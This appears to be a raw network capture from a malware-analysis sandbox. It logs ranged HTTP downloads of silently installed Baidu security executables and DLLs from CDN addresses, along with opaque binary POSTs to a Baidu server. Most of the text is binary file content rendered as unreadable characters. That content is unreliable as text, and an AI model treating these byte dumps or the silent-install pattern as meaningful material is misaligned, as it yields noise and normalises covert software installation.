Content-Disposition: attachment;filename="BDMNet.dll"
024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.
2.2.2.2.2.3.3.3.3.3.3.3.3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3
t3x3|3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3
.4.4.4.4.4.4.4.4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4.4.
4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.5.
5.5.5.5 5$5(5,5054585<[email protected].<.&l
t;.<.<.<.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.
>.>.>.>.>.>.>.> >$>(>,>0>4>8
><>@>D>H>L>P>T>X>\>`>h>l>p&g
t;t>x>|>.>.>.>.>.>.>.>.>.>.>.&g
t;.>.>.>.>.>.>.>.>.>.>.>.>.>.&g
t;.>.>.>.>.>.>.>.?.?.?.?.p.......:.:.:.: :$:(:,:0
:4:8:<:@:D:H:L:X:\:`:d:h:l:p:t:x:|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
.:.:.:.:.;.;.;.;.;.; ;$;(;,;0;4;8;<;@;D;H;.;.;.;.;.;.;.?.?.?.?.?.?.
?.?.?.?.?.?.?.?.?.?.?.?.?.?...........0.0.4.4.4h:l:.:.:.:.:.:.:.:.:.:.
:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.; ;$;(;,;0
;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;.;.;.;.;.;(<,<0<4&l
t;8<<<@<D<P<T<X<\<`<d<h<l<p<
t<x<|<.<.<.<.<.<.<.<.<.<.<.<
.<.<.<.<.<.<.<.<.<.<.<.<.<.<
.<.<.<.<.<.<.<.=.=.=.=.=.=.=.= =$=(=,=0=4=8=<=
@=D=H=L=l=p=t=x=|=.=.=.=.=.=.=.=.=.=.=h?l?p?t?x?|?.?.?.?.?.?.?.?.?
<<< skipped >>>

GET /dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.55

Range: bytes=917504-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 11 May 2014 04:40:07 GMT

Date: Fri, 11 Apr 2014 04:40:07 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 917504-30451943/30451944

Content-Length: 29534440

Age: 339

Via: 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj55:10001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"
..y.$.2..Q...)..q..c.....<Il;s..%..B......n0....T...s'u.8c....$..#g
...j......:.C....V%.c..;.H.w..7.!.y.h...H..L$........ .f.D......V..Pa.
.c. ..R[L.h[......7._..1fb.f....Vz.4..........?.)..j...Q.i.t..)rT..n~.
....k..Ir..Tn...n8.E............=...q...vX3'.4j..J.UC./..i..f.!.9.rYF.
R. ..J.mN...>.<...%....y...Y...<....dN......d.b.D.|A%'..>=
...X...;./..`[email protected]'b.Q..X~.h.......n..a:M.LL.w.p.@..|
k.s. .. ..........lR..Q.oV....~.r-b.mm.................a..-...z.!.h..y
.c.^0..W........[.#....7....__.$;....^(.._xW...|(.j.....[..Q~...U....9
....~{..(.......y;zG'..q<......3.[...Nb...,.\K.._.VS......Z>.a#.
'[email protected]... .Q.\....fW..w.....L.....J1......M...:4
....$ F..J..7..K.3....{.b.i.>...?.m1.:....B(=rYH...d._...s.....}]|.
=...."m.{3..}.......s0.}..Zn1U0&{.<>.|d......D.1..m....J..f.B...
...F...*.H."...1..VRe..,[email protected]......."P.-..#....B.Z7......*.:.w..
[email protected]..!..A.@[email protected]\..?..1...j|..0[Ck..v..;v....7.%...S..].T.dd...v.
......A0...C.......@.:.z.......B...aAe...X.I."h..M... ....A...D..2h.'.
...&.........u......E.>&.(..HzK..tmj\<..I...<.=.o/rl.....).k.
.....`fit.a ...*[email protected].. ...~r....Y..x9.......}..kWb
.39...8...&.}.^[email protected].;Q.I,K.=~..y.0.>Y........3.|~ ....-
.\..;.s..y[........4..c.y.... y.}..yU:{..`...n.U.O..d.4.....p.`.h\..@.
3k.N......5....F5l&.u..d.W.I...V..<.......Q.b.8y....Q...al...=G..X.
4..v..K....[...]D...k.G..[k...........?...{.e."7...}.?0.............J.
..p..,,.......Ed.[.{.0.V)[email protected]...)....Lf....PDe.U.r...YL..
<<< skipped >>>

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Range: bytes=557056-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Thu, 24 Apr 2014 09:30:27 GMT

Date: Tue, 25 Mar 2014 09:30:27 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 18 Mar 2014 11:58:16 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 557056-926535/926536

Content-Length: 369480

Age: 1451693

Via: 1.0 fjpt155:80 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDLogicUtils.dll"
....G.<0|.<9~.<a|.<f~.,A<.w...W....R.............V. P.&
.........L$h.y..r.......:.t.P........G.............L$Xd......Y_^][..P.
...j.h....d.....PQV.....3.P.D$.d........t$.3.......N..F..F..NH.FD.D$..
F4.L$..T$ .NX...D$...V\.Fd.Fh.Fl.Fp.Ft.Fx.F|.................F .F$.F(.
.........L$.d......Y^...................A`<......u..Qt.Ax.....%<
.u..AxV........y.N...F .....Ax^...Qx.Ql.Al;Ah}..Qd....A`..............
..A`:D$.u...........2............V...~`.tUW.......F`<.tF<.u..Fx.
.......y.I...A .....Fx...~x.~l.Fl;Fh}..Vd....F`..........~`.u._.~`.u..
.^.....^[email protected]$Td........Ft.D$..Fx...3..D$
..{..k.8^`t\.F`<*t`</tQ<.u..~t.^x.#<.u..Fx........y.I...A 
.....Fx...~x.~l.Fl;Fh}..Vd....F`.........8^`u..F`<*.. ....F`<.u.
.~t.^x.#<.u..Fx........y.I...A .....Fx...~x.~l.Fl;Fh}..Vd....F`....
......F`</..X...:...2...j!h.o...L$$.D$<.....\$8.\$([email protected]\...@.
.T$.R.VxR.VtR.|$h..9l$4.D$\....r..L$ [email protected]$X.....\$T.
\$D......N\...R..D$8P.D$.P.D$ P.D$h......9l$Pr..D$<P.........L$Td..
....Y_^][..L.</..2....~l.Fl.~x;Fh}..Nd....V`..........F`<*......
j<h.n...L$$.D$<.....\$8.\$(.O....N\[email protected]$.R.VxR.VtR.\$h..9l$4.
D$\...........L$ Q.*............F`<.u..~t.^x.#<.u..Fx........y.J
...B .....Fx...~x.~l.Fl;Fh}..Nd....V`.L$Td......Y_^][..L.........L$Td.
.....Y_^][..L............j.hx{..d.....P...SVW.....3.P.D$,d........F`&l
t;0|.<9......<a|.<f..........A...vy.T$<3....D$(.....\$$.\$
..x......:.u. .PR.L$.......N\...R..D$.P.FxP.FtP.\$@...|$(........D
<<< skipped >>>

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=131072-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 11 May 2014 04:43:11 GMT

Date: Fri, 11 Apr 2014 04:43:11 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 131072-30451943/30451944

Content-Length: 30320872

Age: 150

Via: 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj52:10001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"
........OOO.///.000.000.000.000.000.000.000.000.000.000.000.000.000.00
0.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.
000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.00
0.000.000.000.000.000.000.999.<<<............................
......................................................................
......................................................................
.................>>>.888.000.000.000.000.000.000.000.000.000.
000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.00
0.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.
000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.00
0.///...........................6...-.../.../.../.../...0...0...1...1.
..1...2...2...3...3...4...4...5...5...6...6...6...7...7...7...9...0...
,...,...,.............................................................
..,...,...,...,...,... ... ... ... ... ... ... ... ... ... ... ... ...
*...*...*...*...*...*...*...*...*...*...*...)...3.....................
....///.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.00
0.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.
000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.000.00
0.000.000.000.000.888.???.............................................
......................................................................
......................................................................
@@@.888.111.111.111.111.111.111.111.111.111.111.111.111.111.111.11
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=884736-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:27 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 322784

Content-Range: bytes 884736-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
3.9n.W..1...h.....D$.UPf.l$..?h.....h.....L$.Q..<a...D$..P....I.f..
...f;.u. ...;.~.f.|D.\t.f.DD.\.f.lD.h......$....URf..$$.....g..j..D$ P
..$,...h....Q.....j.hhN....$<...h....R.R......a....,..$....P..;..F.
..z....= a..h.N..P..;..F...a...j..L$.Q..$ ...h....R.....j.h.N....$0...
h....P....... ..$....Q..;..F.......h.N..P...V.h.N..R.F....F..F.h.N..P.
..N.h.N..Q.F ...V.h.O..R.F$...F(.F.h.O..P...N.h,O..Q.F,[email protected].
..F4.F.h\O..P...N.hxO..Q.F8...V.h.O..R.F<[email protected].
FD..9n..FHt_9n.tZ9n tU9n$tP9n(tK9n,tF9n0tA.N4;.t:9n8t59n<t09n@t 9nD
t&;.t"UU.VLR....t..F....._^]3.[..........F.;..=<b..t.P...n..F.;.t.P
...n.j8U...V..e....._^]..@..[.............D$..@[email protected]
VW3.3.j,.D$H.D$L.D$P.D$XWP.D$4.@...|$L.|$\..e.....h........$....WQ.D$&
lt;[email protected]$B...D$D..D$E.D$F..D$G..D$HO.D$I.D$J..D$K.f..$.....(e
...].3....3.9{..|$..D$..D$..D$..D$ .D$$.|$,.......M.;.......9}.......9
}.t.Q.................M.Q3.h.P....$....h.....D$LR.D$T.D$X.D$\.D$P.....
..b..j0.L$d..$....WQ.D$`..d......D$PP.L$4.T$DQ.T$p.S......W.D$\0....|$
`.|$d.D$h.....|$l.t$p.|$x.|$|..$......$..........$......;.t.=.........
.9}.......9}.......3..L$,Q.M..T$.R.D$..D$..D$ .D$$.D$(.D$,...P.QS.....
......D$ [email protected][email protected]$,...D$..D$....Qj@...|$$..D$...|....|$
....q.......|......D$,P.E..L$.Q.J.PS......K....E...}........O.........
.G.;D$ ..........T$$r..2;1u.............s...t]..2... .uE...........tF.
.2... .u............t/..2... .u............t...2... .t...............3
..........p..E.........O...........;D$...k.......T$.r..2;1u.......
<<< skipped >>>

GET /client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.53/dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=1048576-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 1048576-1176519/1176520

Content-Length: 127944

Age: 1193231

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj52:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
.................J...J...J...J...J...J...J...J...J...J..P;.......?AVDN
ameNode@@.P;.......?AVcharNode@@..P;.......?AVpDNameNode@@....P;......
.?AVDNameStatusNode@@...P;.......?AVpcharNode@@.......................
......................................................................
......................................................................
......................................................................
.....................................................................p
..............PST.....................................................
........PDT...........................................................
......8... ...............................(...P;.......?AVsystem_error
_category@?A0x5c686df5@@....P;.......?AVgeneric_error_category@?A0x5c6
86df5@@...(...(.......P;.......?AVthread_interrupted@boost@@..(...(...
(.......de..le..te..|e..P;.......?AVFatalException@protobuf@google@@..
..(...(...............................(...(...(.......(...(...P;......
.?AVZeroCopyOutputStream@io@protobuf@google@@...P;.......?AVArrayOutpu
tStream@io@protobuf@google@@..(...(...P;.......?AV?$sp_counted_impl_p@
V?$basic_regex_implementation@DU?$regex_traits@DV?$w32_regex_traits@D@
boost@@@boost@@@re_detail@boost@@@detail@boost@@..P;.......?AV?$sp_cou
nted_impl_p@U?$regex_traits_wrapper@U?$regex_traits@DV?$w32_regex_trai
ts@D@boost@@@boost@@@boost@@@detail@boost@@...P;.......?AV?$sp_counted
_impl_p@V?$w32_regex_traits_implementation@D@re_detail@boost@@@detail@
boost@@...P;.......?AU?$error_info_injector@Vinvalid_argument@std@
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=917504-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:38 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 290016

Content-Range: bytes 917504-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
$,.....$..........L$ .`......T$..U...;.u...G....>..F......f=l.u..D$
dPQj.......`...5f=f.u3.T$TRQ......`...D$\P.L$XQ...`...T$dR.D$`P...`...
L$d........0.........P....$.<......h......$....Rf..f....#.RQ3.f....
.Qh.......`..........h......$....Rf..f....#.f..RQ........Ph.......`...
P...h......$....Rf..f....#.f..RQ........P..f..f..h......$....P..#.RQj.
h.......`....u.f..$......$.....D$.3.9t$ t-.t$ ...P....I........u.j.j. 
.PVj.j....`..... .D$...t....N..d$.f.....f..u. .....$.....tE.D$..3. .;.
}.....;.$....| ..$.........x...?P..$....P......p.....$.....L$.;...$...
.~m..t(;...}c....j.h.G..........9......;|$.|..A..$....3.9.$....... ...
 .;.~...;.}..d$...$......f..j ....;.|..l$..........D$...tU..t...VP....
.................$.....u...$.... .;.........6RP..$........iR.)........
....|$ .........t[.D6.P........|$ .T$,.N.Q.L$(..$....................V
W................$........tLW.........A..$.....u...$.... .;...r.....$.
......V.R.T$,..i.L$$._.........l$..|$.........|$.....$.....t2;........
.$........j.h.G.................;.|..b.....$....3.9.$....... ... .;.~.
..;...;.....$......f..j ....;.|......f=}.u...C....f=}...$..........f=.
.......f=..w|..t"....j.S.................$...........u....;.~0..f..i..
......B.;.~..........$......RV............f..f..i..f.K.......f..h.e..t
.....j.S.................$.....S..u....;.~...f..j.7....B.;.~..........
$......RV......H.....f..f..i........$.....l$...$.......f..........$...
..........$....;...$......................$.......L?.QR...............
.i..$.....t$.....$.....\$...r .Q...........q..t.W............_..$.
<<< skipped >>>

GET /client/dllqq/BDLogicUtils.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=327680-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local

GET /dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Range: bytes=7864320-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sat, 10 May 2014 14:15:15 GMT

Date: Thu, 10 Apr 2014 14:15:15 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 03 Apr 2014 11:03:48 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 7864320-30926975/30926976

Content-Length: 23062656

Age: 52241

Via: 1.0 fjqz160:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe"
..l......[.6.=...3=.GE,]..;.A...`............1;4x..P...|~..o..#.......
..O...........~r...S.k. .f..w0A........>..hE..!.%[email protected];.&;.`...~.E@.
N......4...R.)....j.5..H....Dz...m.........Q.\.....=..}......e...3....
..o=.....C...Q.............z.....foz. ..'!f.\..'.J...._......./WI....D
...W......=..rM...;..:s*..5...................E.8...m.Z.9JA.2.'.M;.d..
.c..Ll.U......U......Ch....)..G{..\0.u.<...z...Yp.0.. {....[...o.6.
..LA..I.L.{|1 g..c.J.s....%..<....=G....@u....%f\..w....3.c.fW..{(o
..M,3..n.a.4.f.".:1..`R.M....)....,C.......i......X}.....L.Par........
$#....4R.\..w...Iw........q([.*C..A..b...c........E.I......tI...%.Y8R.
TaCk...........s..K.M....~...c`..RT.T&I>?T.e.l.....l...d.y.v.J p.Q@
U..5'...]?Q...|...<[email protected]..?va...v..n........q......
. .wk.P.........B.31..(Ai?Z"p...M<D....<...K. va..*O....{.b^.bL.
.X"/...M`.h..v.. l._.....:1k-.%}...}%.n"...&-|. ..C.....t..I|X~a...-1\
....B.`.)..C..k.q...MP....".>ep..cM.......x.......G..=.a][email protected]
.r!.'....4...M.......f...$v.F0DQt6].9#......R...f...321J4;c.qi..nE....
...):......!L.~.U..o...Y........w..h..{.w.........p..i..-.n..`.l..6...
'.f$K. ".d. Jc.~.cj4 [email protected].... .<i.x......s..[....6Y
..yX...r......lUp..B...'U......vFM.............I.^0....r..fs..3..P....
E....t._.t...ge>..#T."'.c.........i...e.....I..~ph]....BX.[/.....f.
.v.L^.Xq.8........J-oV......A.7...$d,.....v..1b...~.....u....N..L....:
:..j f...B(..o>...p.G*..w..........<.......ikY..%S...x....T.P.w4
.2..3.9.b.=.4....~s.......5?.....5z.8qu_..C...4F..!0..x....k...1D.
<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 77

Content-Type: application/octet-stream

Host: p.x.baidu.com

Keep-Alive: timeout=600,max=1000

...A........." 6c662ebd2fffa805d629b3c9d5a75931([email protected].` ......
HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 133
...y........." 6c662ebd2fffa805d629b3c9d5a75931(.........28..T.c .d...
....[.#d..C:..Y...EQ4r....rU.D../e8O.@...%[email protected].` ......
....


POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 157

Content-Type: application/octet-stream

Host: p.x.baidu.com

Keep-Alive: timeout=600,max=1000

...y........." 6c662ebd2fffa805d629b3c9d5a75931(.........28.
T.c .d.......[.#d..C:..Y...EQ4r....rU.D../e8O.@...%[email protected].` ......t&.......h.R......C...<p
HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 133
...y........." 6c662ebd2fffa805d629b3c9d5a75931(.........28..T.c .d...
....[.#d..C:..Y...EQ4r....rU.D../e8O.@...%[email protected].` ......HTTP/1.
1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream.
.Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 845..
...y........." 6c662ebd2fffa805d629b3c9d5a75931(.........28..T.c .d...
....[.#d..C:..Y...EQ4r....rU.D../e8O.@...%[email protected].` ...........E.
....`..T.hsn..4.,...d. 8@d\...%..~;.9]D....W./..vd.A....#...k.........
XN>......"..4>.G...N....tO.O...b#]9d.a-.5U.=....5.a... ........B
..0..RV...K....S...g..u.J\z:....%.........:H.. .m...%..G.`.^.u..n.....
5.N.jn.BL...][email protected].(u..bt.......L...]...U...s.J.x.
..Yd[3.....%tm. ..*.....5....$A>...k6M"q..........U?.A.xD........1K
.T...?.. y.jR....'.m-X........m....C.....\.....6..v.W.|wR!.....iX.=.N.
.%....T......oM.....u. M...~.I..S.Z....M...`..2.W.C..A=.3K.....a.8....
..0...2.n...l1H.S..'_-.j.......2.8....Sq.q....GcR~...=..a7.. =.hE..T.`
.V.N.m...s...\.L j..G.X..>.?i...v..[..tm;1.f ..A..SV...F.1.P~n....K
..@)$........X9...... ....K.....#.G.~M...]...@......=0S.....9..'7...U.
..W(.Sp...e....u)HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: a
pplication/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Aliv
e..Content-Length: 845.....y........." 6c662ebd2fffa805d629b3c9d5a7593
1(.........28..T.c .d.......[.#d..C:..Y...EQ4r....rU.D../e8O.@...%...8
[email protected].` ...........E.....`..T.hsn..4.,...d. 8@d\...%..~;.9]D....W./
..vd.A....#...k.........XN>......"..4>.G...N....tO.O...b#]9d
<<< skipped >>>

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=8388608-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.55/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=589824-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client/dllqq/BDLogicUtils.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=425984-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local

GET /client/dllqq/BDLogicUtils.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=98304-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=8781824-

Referer: hXXp://dl1sw.baidu.com/

